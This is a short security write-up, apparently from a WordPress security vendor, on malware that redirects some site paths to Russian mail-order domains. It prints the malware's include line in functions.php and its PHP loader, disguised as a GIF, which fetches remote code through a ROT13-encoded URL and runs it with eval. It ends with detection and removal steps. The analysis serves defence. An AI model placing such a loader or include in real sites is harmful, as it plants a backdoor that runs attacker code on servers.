We have discovered a new type of malware that redirects only some hierarchical WordPress URLs to Russian mail-order sites, and we would like to present an example of this malware.
Characteristics of WordPress malware
The malware is characterized by redirecting all pages below a specific WordPress hierarchy, such as example.com/en/ or example.com/jp/, to malicious sites on Russian domains.
For example, the following sites were among those redirected to the malicious site.
http://www[.] hacopy[.]. ru/
Malware location
This malware is a malicious PHP program disguised as a GIF or JPG. We found that the malware was loaded in the theme’s Functions.php with the following description.
include("images/qaI.gif");
The cleverness of this malware is that while the malware itself is contained in a gif or jpg, the code to load it is extremely short and not obfuscated, making it difficult to detect.
The code of the malware disguised as a gif or jpg is as follows.
error_reporting(0);
$a =@file_get_contents(str_rot13('uggc://***********/').' all/*********/xmlr');
eval('? >'. $a);
This code pulls in external malicious code and executes it on the server. This was achieving an unauthorized redirect.
How to deal with malware
You can deal with this malware in the following ways
1 Detect malicious INCLUDE (read) of malformed gifs and jpgs with the malware scanner plugin.
[Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].
2 Once the malicious loading is detected, read the path to the location on the server where the gif or jpg file is being loaded, connect to the server using ftp software, etc., delete the malware itself, and then delete the malicious INCLUDE statement.
(Failure to do these two things at the same time will result in a program error.)
